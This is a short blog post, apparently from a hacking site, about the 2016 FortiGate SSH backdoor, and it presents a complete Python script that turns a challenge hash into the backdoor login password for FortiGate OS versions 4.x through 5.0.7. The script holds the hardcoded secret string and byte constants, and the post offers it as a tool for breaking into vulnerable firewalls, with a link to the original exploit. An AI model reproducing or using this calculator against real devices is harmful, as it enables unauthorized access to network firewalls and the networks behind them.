Fortigate SSH Backdoor Password Calculator



Recently Fortinet Confirmed there was a backdoor in their Firewalls which impacted FortiGate Os Version 4.x - 5.0.7.

and Exploit was actually released in the wild but it took some efforts to work with like patamiko/termios/msvcrt.

so theprohack.com 's Founder Risahbh Dangwal ported the code to create a quick and dirty password calculator that will help in breakout forinet firewall with Vulnerable Version.

He Tested on Test Firewall and it works perfectly fine.

here is Code:

# Title    : Fortigate Backdoor Password calculator
# Date    :  24 March 2016
# Author   :  Rishabh Dangwal, original exploit by operator8203@runbox.com.
# Author Homepage  :  www.theprohack.com
# Author Email   :  admin@theprohack.com
# Vendor Homepage :  www.fortinet.com
# Version   :  FortiGate OS Version 4.x -  5.0.7
import base64
import hashlib
print "Enter hash challenge " ; chash = raw_input()
pwdhash = hashlib.sha1()
pwdhash.update('\x00' * 12)
pwdhash.update(chash + 'FGTAbc11*xy+Qqz27')
pwdhash.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
fhash = 'AK1' + base64.b64encode('\x00' * 12 + pwdhash.digest())
print "password is %s" %fhash

Link of Code: https://packetstormsecurity.com/files/136430/Fortigate-Backdoor-Password-Calculator.html



Post a Comment

www.CodeNirvana.in

Copyright © Hackers TreeHouse | Designed By Code Nirvana